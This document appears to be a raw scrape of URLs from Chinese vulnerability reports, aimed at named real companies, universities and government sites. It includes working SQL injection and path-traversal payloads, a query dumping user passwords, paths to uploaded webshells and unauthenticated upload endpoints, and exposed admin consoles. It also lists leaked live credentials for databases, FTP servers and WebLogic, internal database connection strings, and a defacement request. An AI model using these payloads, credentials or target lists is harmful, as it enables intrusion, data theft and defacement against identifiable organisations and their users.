http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**//gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ 
http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/dxwebdisk//gg_show.aspxid=@@version_ http://**.**.**/webdisk//gg_show.aspxid=@@version_ http://**.**.**//gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/wdisk//gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/wjfw/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**//gg_show.aspxid=@@version http://**.**.**.**/adm/index.php http://www.atsmart.net/download.php?filename= http://www.atsmart.net/download.php?filename=..//../../etc//passwd http://221.179.195.110/ http://www.mescake.com/、http://touch.mescake.com/ http://weixin.21cake.com/info.php,找到了网站目录 http://job.bbn.com.cn/login/top_count.action存在struts2 http://**.**.**.**/admin-console/可惜,此站该页被删 http://**.**.**.**/jmx-console/ http://**.**.**.**/login.asp http://drops.wooyun.org/web/7112 https://mp.weixin.qq.com/cgi-bin/setuserinfo?action=intro&t=ajax-response&token=589115843&lang=zh_CN&f=json&ajax=1&random=0.3911454190965742&intro=hacked%20by%20shidada 
https://mp.weixin.qq.com/cgi-bin/modifygroup?t=ajax-friend-group&token=589115843&lang=zh_CN&f=json&ajax=1&random=0.0741190540138632&func=add&name=helloasasas https://mp.weixin.qq.com/cgi-bin/setuserinfo?t=ajax-response&token=589115843&lang=zh_CN&f=json&ajax=1&random=0.5444546448998153&action=search&open=0 http://market.gb246.com http://market.gb246.com/upload.html http://**.**.**.**/ http://180.169.30.13:2046/ajax/uploadfile.php?DontCheckLogin=1 http://180.169.30.13:2046/tmpfile/upd211A.tmp.php http://prm.yonyou.com/login/login.php http://180.169.30.13:2046/login/login.php http://112.64.196.14/login/login.php http://crm.naide.com.cn/login/login.php http://crm.szclou.com:8088/login/login.php http://crm.szclou.com:8088/login/login.php http://119.6.104.10:7788/wap/login_wap.php http://qinyuancrm.com/login/login.php http://111.207.244.5:8888/login/login.php http://crm.transn.net/login/login.php http://etools1.bitp.cn:2000/login/login.php https://crm.itrus.com.cn/login/login.php http://kfdq369.gicp.net/login/login.php http://www.kdlian.com:8001/login/login.php https://crm.itrus.com.cn/login/login.php http://prm.chanjet.com/login/login.php http://xlcrm.tbea.com.cn:8088/login/login.php http://prm.ufida.com.cn/login/login.php http://crm.elfa.com.cn/login/login.php http://aqe.wyn88.com:9002 http://aqe.wyn88.com:9002/jquery/wooyun_test.jsp http://115.236.99.184/sys/main.action http://www.donews.com/idonews/article/6895.shtm http://www.donews.com/idonews/article/6895*.shtm http://jf.ztgame.com/detail.php?id=1114 http://**.**.**.**/bugs/wooyun-2010-058073)修复了,但还存在任意上传漏洞。 http://www.xingchetong.com/xingchetong/如图所示: http://g.xingchetong.com/SystemUser!exitSys.do,打开登录界面,如图所示: http://g.xingchetong.com http://www.picchealth.com/DesktopModules/C_Info/WebService/C_InfoService.asmx http://channel.wepiao.com/ http://channel.wepiao.com/index.php?r=Presell&cid=132 http://games.pwel.com.cn/EventsDota2/EventsDetailsArc4?cupId=879 
http://shop.ehuatai.com/isale/risk/casualtyInsuranceAction-viewOrder.action?orderNo=201205023791 http://zbwmsreport.gb246.com/ReportServer/ http://zbwmsreport.gb246.com/ReportServer/Pages/ReportViewer.aspx?%2fB2C_MIS_CONSUMER&rs:Command=Render http://zbwmsreport.gb246.com/ReportServer/Pages/ReportViewer.aspx?%2fB2C_MOVE_PHYSIC&rs:Command=Render http://zbwmsreport.gb246.com/ReportServer/Pages/ReportViewer.aspx?%2fB2C_MIS_REVAT&rs:Command=Render http://zbwmsreport.gb246.com/ReportServer/Pages/ReportViewer.aspx?%2fBabyCarrierExistStorage&rs:Command=Render http://zbwmsreport.gb246.com/ReportServer/?%2fData+Sources&rs:Command=ListChildren http://zbwmsreport.gb246.com/ReportServer?%2fBMR_CX_FSDRP%2fDrpCenterZFZData&rs:Command=GetDataSourceContents http://27.223.70.21:8080/cc/ccframe/login.jsp http://www.innmall.cn/api/logs/ http://60.214.112.114:8400 http://download.74cms.com/download/74cms_v3.6_beta_20150817.zip http://sns.neusoft.com/index.php?act=doAdminLogin&app=home&mod=Public https://sro.hikvision.com/ http://scan.cninsure.net/common/cvar/CExec.jsp http://scan.cninsure.net/common/cvar/CExec.jsp http://shop.ehuatai.com/ http://pan.baidu.com/s/1qWGFevM http://myadmin.zol.com http://www.zol.com/admin/ http://123.129.51.44:8880/ http://**.**.**.**/ckfinder/ckfinder.html?action=js&func=SetFileField&data=xPicture&thumbFunc=ShowThumbnails&start=Images.asp%3A%2F%3A0 http://**.**.**.**/admin/ajaxgetty.ashx?gy=9L%27;waitfor%20delay%20%270:0:10%27;--%20-anUrwfN&t=0.9660481179598719&type=A http://**.**.**.**/admin admin:admin http://mcice.gb246.com/ http://mcice.gb246.com/admin-console/login.seam?conversationId=1979 http://mcice.gb246.com/jmx-console/ http://www.sobot.com/console//haha/logo/20c7508fb91d478cb18d85503ec6d769.jsp?pwd=023&i=id http://oa.cn.umiwi.com/index/index http://**.**.**.**/、http://**.**.**.**用户登录处注入 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ 
http://**.**.**.**/gcxm.asp?id=9704 http://new.testcenter.gov.cn:8080/index.php http://www.testcenter.gov.cn/ http://new.testcenter.gov.cn:8080/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini http://new.testcenter.gov.cn:8080/css/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini http://new.testcenter.gov.cn:8080/index.php cn:8080 http://**.**.**/getGoodsDetailWapfruitId=598 http://structure.hfut.edu.cn:80/news/view.php?id=177&type=zxxw http://yqkx.hfut.edu.cn:80/college_list.php?id=269 http://gdjy.hfut.edu.cn:80/picNewsInfo.jsp?id=1 http://dwxy.hfut.edu.cn:80/listxs.php?id=768&title=%D4%BA%B3%A4%D6%C2%B4%C7&nid=251 http://szb.hfut.edu.cn/news/shownews.php?lang=cn&id=127 http://yxgcxy.hfut.edu.cn:80/about.php?tid=19 http://structure.hfut.edu.cn:80/news/view.php?id=177&type=zxxw http://yqkx.hfut.edu.cn:80/college_list.php?id=269 http://gdjy.hfut.edu.cn:80/picNewsInfo.jsp?id=1 http://dwxy.hfut.edu.cn:80/listxs.php?id=768&title=%D4%BA%B3%A4%D6%C2%B4%C7&nid=251 http://szb.hfut.edu.cn/news/shownews.php?lang=cn&id=127 http://yxgcxy.hfut.edu.cn:80/about.php?tid=19 http://www.supident.com/?f=show&catid=23&id=145 http://**.**.**.**/grid/portal/base/login.action http://btr-daxue.800best.com/Account/Login http://**.**.**.**/defaultroot/aep/login.jsp http://**.**.**.**:7001/defaultroot/Logon.do https://**.**.**.**/s?wd=inurl%3Adefaultroot%2F&rsv_spt=1&issp=1&f=8&rsv_bp=0&rsv_idx=2&ie=utf-8&tn=baiduhome_pg&rsv_enter=1&rsv_sug3=5&rsv_sug1=4&rsv_n=2&rsv_sug2=0&inputT=2953&rsv_sug4=2953 http://www.tclcomm.com//manual.asp?typeid=1 http://www.tclcomm.cn/product_detail.asp?Pid=1032 http://www.tclcomm.com/product/productsearch.asp https://github.com/xym-loveit/lucky-imoney jdbc:oracle:thin:@10.79.11.213:1521:actbmdb jdbc:oracle:thin:@localhost:1521:sfpay jdbc:oracle:thin:@10.79.11.217:1521:coredb jdbc:oracle:thin:@10.79.11.213:1521:coredb http://10.79.11.207:9014/sms/hessian http://10.79.11.207:9002/account/hessian http://10.79.11.207:9004/member/hessian 
http://10.79.11.207:9006/order/hessian http://10.79.11.207:9001/report/hessian http://10.79.11.207:9007/oms-server/hessian http://10.79.11.207:9011/rmms/hessian http://10.79.11.207:9010/schedule/hessian http://10.79.11.207:9012/acquirer/hessian http://10.79.11.207:9008/mms/hessian http://10.79.11.207:9020/waybill/hessian jdbc:mysql://127.0.0.1:3306/lucky?useUnicode=true&characterEncoding=utf8 www.sf-card.com【顺丰速运】 http://edu.189.cn/eschool-user-portal/register/findInfoByAccount.do?_d=1440551725189&accountString=test&bindType=0&Token=-1 http://edu.189.cn/eschool-user-portal/auth/loginPage.do http://**.**.**.**/njr.sql http://pp.funshion.com/monitor/user_login/ http://60.13.143.170:8080 http://**.**.**.** http://px.circ.gov.cn/tabid/95/Default.aspx http://218.200.48.230:8091/ http://be.zhinanmao.com/#triparticlelist http://admin.hp1997.com name:wlhp10015 pass:wlhp10015 http://115.182.93.108:8080/ guest:guest登陆,,,,同样能泄露大量机器信息 root:letv!@# http://eyemain.znv.com/ http://**.**.**.**/user/fastlogin.json?mobile=18511339112&verify_code=4480&anycode=soask_**.**.**.** http://**.**.**.**:8512/HWTRP/../ http://**.**.**.**/111/index.jsp http://zdys.zju.edu.cn/bmdt_info.php?id=1053 http://123.127.251.8:7001/console/ http://123.127.251.8:7001/system/warning.jsp jdbc:oracle:thin:@10.10.134.23:1521:slistest jdbc:oracle:thin:@10.10.139.20:1522:ora57 www.wy-fund.com http://0cx.cc/phpcms_phpsso_auth_key.jspx http://wooyun.org/bugs/wooyun-2014-065560 http://123.127.251.11 http://123.71.192.123:8085 http://ok.okchang.com/report/ http://xss.gift/okchangcsrf.html http://blog.ccjt.net/batch.common.php?action=modelquote&cid=1&name=spacecomments http://blog.ccjt.net/batch.common.php?action=modelquote&cid=1&name=spacecomments%20where%201=2%20union%20select%201,2,3,4,5,group_concat%28uid,0x7c,username,0x7c,password,0x7c,email%29,7,8,9,10,11,count%28*%29%20from%20uc_members%20where%20uid=2%23 http://**.**.**.**/company.asp?id=dfzy980720 encap:Ethernet F8:63:FD fef8:63fd/64 Scope:Link MTU:1500 
packets:3251136 packets:1749629 txqueuelen:1000 http://121.34.253.167:7001/ weblogic:weblogic http://121.34.253.167:7001/Ninty/Ninty.jsp http://**.**.**.**/admin/Main.asp http://oa.okair.net/seeyon/logs/login.log无法获取,方法是再加一个目录符http://oa.okair.net/seeyon//logs/login.log: http://1.202.246.5:8080/OrderDetialInfo.aspx http://www-baidu.co/ql/x.php http://user.blyol.com/detail/?id=21286 http://jpkc.sysu.edu.cn/sxgl/info_view.asp?VID=545 http://www.ahjsfy.com:82/admin/chwSysEmployor_login.action存在命令执行漏洞 http://wooyun.org/bugs/wooyun-2015-097749 http://bbs.wasu.cn/home.php?mod=task&do=view&id=1 https://**.**.**.**/Francispp/cms/blob/0c63b2e2ba6d17fe43807fbb5fe8e773b5f7ef26/.svn/pristine/b2/b225134ad59442650db88b8f734801079231a0c7.svn-base http://www.xxsjsw.gov.cn/HNWeb/conference/09zrpxbmore.aspx?category=202 http://www.xxsjsw.gov.cn/hnweb/conference/08dsdhhymore.aspx?category=156 http://ops.cntv.cn http://www.jscz.gov.cn:7001/coremail/index.jsp http://www.jscz.gov.cn:7001/coremail/index.jsp http://pay.soufun.com/Log.aspx?id=6 http://pay.soufun.com/manager/login.aspx http://www.163disk.com/admin/ http://**.**.**.**/admin/CYCL_see.aspx?tc=congye&id=573/admin/CYCL_see.aspx?tc=congye&id=573存在注入漏洞,参数id http://**.**.**.**/News_model.asp?nid=22 https://github.com/limijiaoyin/php-ihome/blob/c38b1160d0022d1306e566f78125ecc4408e9d35/ihome/data/data_mail.php https://github.com/songziming/webmail/blob/d23894b571e6d2373eef6d7e3d65ec61c0327607/config.js http://club.show.sina.com.cn user:club_user@10.192.17.153 http://product.7po.com/index/product?id=219&zz=1 http://**.**.**.**/Address/145162 http://**.**.**.**/GoodsUserOrder/MyOrderList_sw?UserID=145162&PageSize=10&PageIndex=1 http://**.**.**.**/StreetReview/145162/StreetReview?PageSize=10&PageIndex=1 http://administrator.datebao.com/custom/service/lipei/show/39 http://opadmin.datebao.com/customer/customer_access https://github.com/laodaxyz/python_scripts/blob/e1838d85a9863c15c3a9b39607bbf59123bf7bfd/sendmail.py http://**.**.**.**/ 
http://**.**.**.**/eqspace/jjie@**.**.**.**?form=s_nfolder&myparent=/%B9%FA%BC%D2%B2%E2%BB%E6%B5%D8%C0%ED%D0%C5%CF%A2%BE%D6%CE%C4%BC%FE http://180.169.30.13:2046/ajax/swfupload.php?DontCheckLogin=1&vname=file http://180.169.30.13:2046/tmpfile//swf2121.tmp.php http://prm.yonyou.com/login/login.php http://180.169.30.13:2046/login/login.php http://112.64.196.14/login/login.php http://crm.naide.com.cn/login/login.php http://crm.szclou.com:8088/login/login.php http://crm.szclou.com:8088/login/login.php http://119.6.104.10:7788/wap/login_wap.php http://qinyuancrm.com/login/login.php http://111.207.244.5:8888/login/login.php http://crm.transn.net/login/login.php http://etools1.bitp.cn:2000/login/login.php https://crm.itrus.com.cn/login/login.php http://kfdq369.gicp.net/login/login.php http://www.kdlian.com:8001/login/login.php https://crm.itrus.com.cn/login/login.php http://prm.chanjet.com/login/login.php http://xlcrm.tbea.com.cn:8088/login/login.php http://prm.ufida.com.cn/login/login.php http://crm.elfa.com.cn/login/login.php http://**.**.**.**/xw.asp?id=44 http://**.**.**.**/cn/index_74.html http://www.ciicts.com.cn/eng/qianzheng2.asp?id=44 http://vote.yeshj.com/Hypervisor/ http://vote.yeshj.com/Hypervisor/default.aspx?keyword='or http://mt.sogou.com/bbs/ http://123.127.217.137:7001/console/ http://123.127.217.137:7001/jmxroot/jmxroot.jsp http://www.chinawutong.com/FindPSW/InputUserName.aspx http://roadshow.cnfol.com/show/ajaxlist/13293?name=1&page=1&sort=0&type=0 http://csc.zte.com.cn/CSC/UILoader/login.aspx site:csc.zte.com.cn,发现大量秘密级别文档,全部是项目相关文档 http://csc.zte.com.cn/AttachCenter/AttachDownload.aspx?p=EN4FOMh5cAc3JOpiypPFoMCVzNlN4kILX87QDpcaPJTtW6fumZiyXf4C3Cq4dMuC http://csc.zte.com.cn/AttachCenter/AttachDownload.aspx?p=X4usxCq6tXxZAjZFXNkM%2FeIkvfrWUewrODeFAjgQMIpdoYwjpZIHauzrJkDntXpb http://csc.zte.com.cn/AttachCenter/AttachDownload.aspx?p=8yRlrrPmJM2AGjq%2F9dXKq1aOPoNjsW2KiQP0psyJyZONWpKaXklbZXJy5H8HMgD2 
http://csc.zte.com.cn/AttachCenter/AttachDownload.aspx?p=n0YbqdgE5nhUJpAOxkdBvMw%2BVpKv7qTOPWHpEIcoRqvuU0sqsAdtZDjpwoALPccN http://csc.zte.com.cn/AttachCenter/AttachDownload.aspx?p=2egd7jvMCCP9uLuqvcTZjDuka0VhRylkLTMO5K0GzLqQ%2BT0ZlOwwnujnRe6a0Xy7 http://**.**.**.**/index.htm http://new.edong.com:80/ https://github.com/HEYanTao/QuantitativeTrading/blob/21d97feff96ed5d6ce91e82b50a50b535066660d/WarningSystem/sendwarning.m http://**.**.**.**/fdc/news.php?news_id=566 http://**.**.**.**/admin http://**.**.**.**/bugs/wooyun-2010-086554可以继续深入就不多说了,当然这里没有继续深入 http://www.jzq001.com/forum.php?mod=viewthread&tid=45865&extra=page%253D1&page=1 http://**.**.**.**/web/login.do http://oa.guanhao.com:8080/kingdee/tree/tree/get_mail_value.jsp?ids=1&flag=dept http://www.hiall.com.cn/users/edit.php http://games.pwel.com.cn/MatchDota2/EventsDetailsArc2?userid=100013&userstr=1&cupId=1 http://games.pwel.com.cn/MatchDota2/EventsDetailsArc2?userid=100013&userstr=1&cupId=865 http://**.**.**.**/upload/ http://**.**.**.**/upload/201403/filename.zip http://**.**.**.**/bocadmin/ http://mis.998.com/GreenTreeInn/Login.aspx https://report.ztgame.com/game/ http://27.112.87.199/ ip:123.57.220.206登陆,刚打开就看到了这个,资源管理系统,吓我一跳,我还以为管理员在线呢。。。 http://open.ctrip.com/help/download.aspx?belong=CooperationMode&pagename=download http://hotelv2.ctripapi.cn http://www.hefeiciming.com/tjsb_list.php?cat_pid=33&cat_id=34 http://test.pwel.com.cn/EventsDota2/EventsDetailsArc4?cupId= http://test.pwel.com.cn/MatchDota2/EventsDetailsArc2?userid=100013&userstr=1&cupId=1 http://e.chuchujie.com/admin/checking http://app.gz163.cn/kd/admin/ http://www.21boya.cn/shgreenbox/App/Admin/Lang/conn.php http://office.homeinns.com/Hcs/uploadfiles/ http://oa.homeinns.com/Voucher/Tasks/TaskList.aspx http://bbs.51job.com/adminbbsjob.php http://**.**.**/Home/LogIn http://www.ztesun.com/admin/login.asp http://www.ztesun.com/about.asp?id=1 http://www.ztesun.com/productshow.asp?id=44&sid=46&keyword= 
http://www.doit.com.cn/api.php?op=news_more&start=1&siteid=1 http://**.**.**.**/web/newsAction!loadNews.action?newsId=402880a03d857fa3013d86d086f30004 URL:http://**.**.**.**/spAppoExamine/spAppoExamine!examineListAll.action?domainCode=nt¶mSP= URL:http://**.**.**.**/portel/showNoticeIndexINfo.action?id=2901&categoryId=4 http://**.**.**.**:8080/wz-article!detail.action?id=8825&typename=wz http://**.**.**.**/ContentAction_getContent.action?id=4340812A3198434E9BCF59EDF2B9367C URL:http://**.**.**.**/xinwen/index.action https://i.genshuixue.com/forget https://i.genshuixue.com/forgotpwd/code.do https://**.**.**.**/login/yzemail?email=1234563@**.**.**.** http://202.198.17.28/swsysfzx/admin/login.php http://zhaosheng.nynu.edu.cn/zsw/ajax.ashx?action=ysquery&gkbmh=1&rand=0.4010385440196842&sfzh=e&yszkzh=e http://**.**.**.**/book.aspx?taskno=024002 http://**.**.**.**/fwpt/shownews.asp?id=229&xxfl=3 http://lib.hrbeu.edu.cn/x/sjk.asp?id=304 http://archives.hrbeu.edu.cn/pub/search/default.asp?id=28 http://chengeng.hrbeu.edu.cn/showarticle.php?articleid=531 http://job.hrbeu.edu.cn/admin1/info/typeinfo.asp?infotype=%CD%A8%D6%AA%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&typeid=47 http://gxpt.hrbeu.edu.cn/model/twogradepage/devTrans.aspx?devcode=%7BSchoolNo%7D http://jxpj.hrbeu.edu.cn/1.jsp密码 http://ysszfj.hrbeu.edu.cn/1.jsp http://hr.hrbeu.edu.cn/downLoadFile.do?filename=hhr-configMVC.xml&filepath=WEB-INF/config/ http://www.fjbs.gov.cn/userCenter.action?fn=passwordBackCheckUserPage http://**.**.**.**/about.asp?AsSortID=1 http://**.**.**.**/newsinfo.asp?id=530 http://**.**.**.**/physical.php?cat_pid=23&cat_id=24 http://**.**.**.**/DeptLogin.aspx http://**.**.**.**/std/ http://wkd.edaijia.cn/。用数据库工具连接123.56.47.59:3306,账号是root,密码是root,登录后可看到数据库内部表和表内容。 http://www.gannanxian.org/CMSUploadFile.aspx http://bink.gq/CMSUploadFile.aspx http://bink.gq/CMSUploadFile.aspx http://tp.huaxi88.com/CMSUploadFile.aspx http://sns2.maticsoft.cn/CMSUploadFile.aspx http://sns3.maticsoft.cn/CMSUploadFile.aspx 
http://www.weichimei.com/CMSUploadFile.aspx http://miguajie.com/CMSUploadFile.aspx http://ipangda.com/CMSUploadFile.aspx http://kbfsshop.gotoip1.com/CMSUploadFile.aspx http://www.hzskate.com/CMSUploadFile.aspx http://mall.66jyw.com//CMSUploadFile.aspx http://xiangyig.com/CMSUploadFile.aspx http://www.remaigou.com/CMSUploadFile.aspx http://adsm.qq.cc/CMSUploadFile.aspx http://shishangliangli.com.cn/CMSUploadFile.aspx http://fanjian83.com/CMSUploadFile.aspx http://localhost:8080/CMSUploadFile.aspx http://**.**.**.**:7003/sungov/findpwd.do http://mark.ad.sogou.com/ http://mark.ad.sogou.com/mark/remark?userid=28&taskid=2707 http://**.**.**.**/sbzs.php?classid=29 http://**.**.**.**/test.php http://**.**.**.**:8081/apps/xqp2/pages/workflows/report/ReprotTrackingWorkflows.aspx?statrtime=2011-07-28&endtime=2015-08-27&dptName=%E7%BD%91%E7%BB%9C%E5%85%AC%E5%8F%B8%E7%BD%91%E7%BB%9C%E5%BB%BA%E8%AE%BE%E9%83%A8&type=1 http://www.secwk.com/uploads/ http://www.secwk.com/uploads/upload/renzheng/ http://www.secwk.com/uploads/upload/renzheng.tgz http://www.secwk.com/uploads/bmzcert/month_1508/ http://www.secwk.com/uploads/imgupload/ http://121.193.130.41/rs_recruit/HR4001Action.do?param=applicantRegisterType http://www.tingbook.com:80/Activity.rar http://www.tingbook.com:80/user.rar http://**.**.**.**/,新华网思客平台存在sql注入漏洞,通过注入可获取到大量用户账户信息。 http://www.haohaizi.com/ http://vip.kuwo.cn/vip/jsp/login.jsp?status=4这个接口是酷我vip的一个登陆接口,登陆位置未做登陆验证机制 URL:http://61.183.121.210:9113/login/Login.jsp?logintype=1 http://www.yunguanche.com/workspace.shtml http://mo.gw.com.cn//iCooperateHtml.php?pageurl=http://127.0.0.1:22/ shell:http://rd.haierpeople.cn/Upload/b_201508271329172.asp http://passport2.chaoxing.com/admin/ http://g.baofeng.com/special/api/zonelist.json?order=2&shortname=jjsg%22%20AND%203*2*1%3d6%20AND%20%22000DV8Q%22%3d%22000DV8Q&status=2 http://www.fsrqxh.com/current/Login http://**.**.**.**/accNet/findPass.html?r=0.032482340931892395 http://**.**.**.**/user/index.html http://**.**.**/_ 
http://**.**.**/_ http://**.**.**/_ http://**.**.**/bg/_ http://**.**.**/_ http://**.**.**/_ http://**.**.**/_ http://**.**.**/_ http://**.**.**/_ http://**.**.**/_ http://**.**.**/ http://**.**.**.**/vote/vote.asp?id=35 http://219.143.118.86/ http://180.97.2.9/.svn/entries http://180.97.2.9/.svn/text-base/ugv.war.svn-base http://iposs.sdinfo.net/ldims/szxAssess/szxAssessAction!queryPon.action?city_id=08000104&successFlag=0&statsDate=2015-04-01&endDate=2015-04-30 http://iposs.sdinfo.net/ldims/szxAssess/szxAssessAction!queryPon.action?city_id=08000106&successFlag=0&statsDate=2015-01-01&endDate=2015-05-05 http://113.247.255.18:8000/general/vmeet/wbUpload.php http://113.247.255.18:8000/general/vmeet/1.php http://60.**.1*.** http://60.1#.#5.1#:7001/jmxroot/jmxroot.jsp jdbc:oracle:thin:@192.168.55.185:1521:orcl pass:t*** jdbc:oracle:thin:@192.168.54.86:1521:orcl jdbc:oracle:thin:@192.168.54.253:1521:orcl jdbc:oracle:thin:@192.168.53.26:1521:oradepl jdbc:oracle:thin:@192.168.53.51:1521:ora10g jdbc:oracle:thin:@192.168.54.150:1521:ora10g http://**.**.**.**/project.php?id=34 https://github.com/cobin/selfProxyStock/blob/07596f9bdec972a7edf1f139bdf66a51e86b4b04/lib/sendmail.js http://www.foamka.me/bpcrm_coffee/weixinportal/ http://huaweimossel.com/user.php?act=login https://code.csdn.net/topthink2011/ThinkPHP/merge_requests?direction=desc&sort=1 http://switch.17u.cn/UpdateHotelRooms.aspx http://switch.17u.cn/Log.aspx http://218.66.104.28:308/chuli.aspx?s=0.09647750668227673&oper=cha_jieguo&p1=9&p2=90 https://jf.ffan.com http://www.21boya.cn https://www.tzbao.com/ https://www.tzbao.com/auth/memberAction!submitInfo.jspx http://img.tzbao.com/RRmwT03073.html ftp://navigator:hisensoft@218.58.78.181 ftp://navigator:hisensoft@222.173.107.70 ftp://navigator:hisensoft@218.58.78.146 http://**.**.**.**/om https://rcp.damai.cn/por/login_psw.csp?rnd=0.004662641091272235#https%3A%2F%2Frcp.damai.cn%2F https://rcp.damai.cn/com/setup.html?4 www.damai.cn http://106.39.51.192/ 
http://**.**.**.**/jdh?code=bqxl http://180.169.30.13:2046/ajax/getemaildata.php?DontCheckLogin=1&filePath=../version.txt http://180.169.30.13:2046/ajax/getemaildata.php?DontCheckLogin=1 http://180.169.30.13:2046/tmpfile/upd2134.tmp.php http://prm.yonyou.com/login/login.php http://180.169.30.13:2046/login/login.php http://112.64.196.14/login/login.php http://crm.naide.com.cn/login/login.php http://crm.szclou.com:8088/login/login.php http://crm.szclou.com:8088/login/login.php http://119.6.104.10:7788/wap/login_wap.php http://qinyuancrm.com/login/login.php http://111.207.244.5:8888/login/login.php http://crm.transn.net/login/login.php http://etools1.bitp.cn:2000/login/login.php https://crm.itrus.com.cn/login/login.php http://kfdq369.gicp.net/login/login.php http://www.kdlian.com:8001/login/login.php https://crm.itrus.com.cn/login/login.php http://prm.chanjet.com/login/login.php http://xlcrm.tbea.com.cn:8088/login/login.php http://prm.ufida.com.cn/login/login.php http://crm.elfa.com.cn/login/login.php http://work.tju.edu.cn/ http://work.tju.edu.cn/notice_content.php?id=35 http://api.breadtrip.com/trips/2387122224/waypoints/ http://api.breadtrip.com/trips/2387122223/waypoints/ http://api.breadtrip.com/trips/2387122214/waypoints/ http://api.breadtrip.com/trips/2387122215/waypoints/ http://**.**.**.**:8088/gallery.php?id=3 http://**.**.**.**:8088/manage/ http://**.**.**/DrcomManager/login.doP=logincor http://ipay.so/ https://**.**.**/himyxia/shell/blob/master/connect_ssh.sh ay.so/Q***** http://fxs.cnfol.com/ http://fxs.cnfol.com:80/ gps.wcagps.com/en www.gcwgps.com www.1688gps.hk www.yibugps.com http://rss.dongfeng-nissan.com.cn/login.aspx http://j.news.163.com/docs/4/2015081620/B15O8DM190018DM2.html http://service.mtime.com/存在sql注入漏洞,可脱库获取到很多个数据库的信息。 var:page=connected&var:retag=1 var:page=connected&var:retag=1 var:page=connected&var:retag=1 var:page=connected&var:retag=1 var:page=connected&var:retag=1 var:page=connected&var:retag=1 var:page=connected&var:retag=1 
var:page=connected&var:retag=1 var:page=connected&var:retag=1 var:page=connected&var:retag=1 var:page=connected&var:retag=1 name:getpage value:html/index.html name:var:page value:connected name:var:retag http://**.**.**.**/TR/xhtml1/DTD/xhtml1-transitional.dtd http://**.**.**.**/1999/xhtml http://**.**.**.**/license/login.php url:http://iufo.fjtic.cn:9090/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID= http://puppetmaster.chinacache.com:8000/ http://puppetmaster.chinacache.com:8000/demo.sh http://119.90.1.204/wr/ http://42.62.25.8:9090/yufeng/ http://www.sxtv6.com http://**.**.**/ http://www.rufengda.com/front/queryServiceLocation.do https://github.com/ptzhuf/learning/blob/master/pay_stats-pay.properties https://github.com/ptzhuf/learning/blob/master/17ay_pay.properties http://106.39.17.117:8088/ESSSWebII/ www.sjjx.uestc.edu.cn/Index/newsshow/5 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/system/login.jsp http://**.**.**.** http://**.**.**.**/FindBackPwd.aspx http://**.**.**.**/ http://**.**.**.**/search.asp?KeyWord=88952634&page=1 http://git.goodaysh.com/Benz.Huang/rrs-mall/commit/2ae19cfe419e513f0d3ff7d15d930e71bb6be2d6.patch http://**.**.**.**/extmail/cgi/index.cgi?error=msg&__mode=show_login http://**.**.**/index.jsp http://**.**.**/console/ http://wx.pp.cc/wb_u/login https://exchange.chanjet.com/ https://github.com/viekst/python-code/blob/master/Exchange_Address_Export.py http://**.**.**.**/.svn/entries http://**.**.**.**/demo/mysql/ http://www.ctnma.cn/ioop-bcs-web/sys/sys-pwd-question!check.do http://**.**.**.**/ http://**.**.**.**:80/synthReports/wt/questionActionlist2.action?selinput=1 http://t.95105555.com:9001/manager/html http://drops.wooyun.org/tips/604 http://tcmobileapi.17usoft.com/memberextend/ http://tcmobileapi.17usoft.com/flight/orderhandler.ashx http://www.ctfeshop.com.cn/ http://www.ctfeshop.com.cn/user/address.aspx?oid=113588 
http://218.107.49.180/ http://tkkw.crtvu.cn/ http://tkkw.crtvu.cn/unitiveexam/report/studentexamcard.aspx?_batchid=26&_studentcode=681 https://121.10.200.39/cgi-bin/webproc https://121.10.200.40/cgi-bin/webproc https://121.10.200.144/cgi-bin/webproc https://121.10.200.145/cgi-bin/webproc https://121.10.200.146/cgi-bin/webproc https://121.10.200.148/cgi-bin/webproc https://121.10.200.149/cgi-bin/webproc https://121.10.200.151/cgi-bin/webproc https://121.10.200.153/cgi-bin/webproc https://121.10.200.155/cgi-bin/webproc https://121.10.200.157/cgi-bin/webproc https://121.10.200.159/cgi-bin/webproc https://121.10.200.161/cgi-bin/webproc https://121.10.200.162/cgi-bin/webproc https://121.10.200.163/cgi-bin/webproc https://59.35.31.239/cgi-bin/webproc https://113.86.163.35/login_zdc.htm https://113.86.163.46/login_zdc.htm https://113.86.163.55/login_zdc.htm https://113.86.163.183/login_zdc.htm https://113.86.184.106/login1.htm https://113.86.184.112/login1.htm https://113.107.192.45/login_zdc.htm https://113.107.192.131/login_zdc.htm https://113.107.192.6/login1.htm https://113.107.192.81/login1.htm https://113.107.192.138/login1.htm https://113.107.192.205/login1.htm 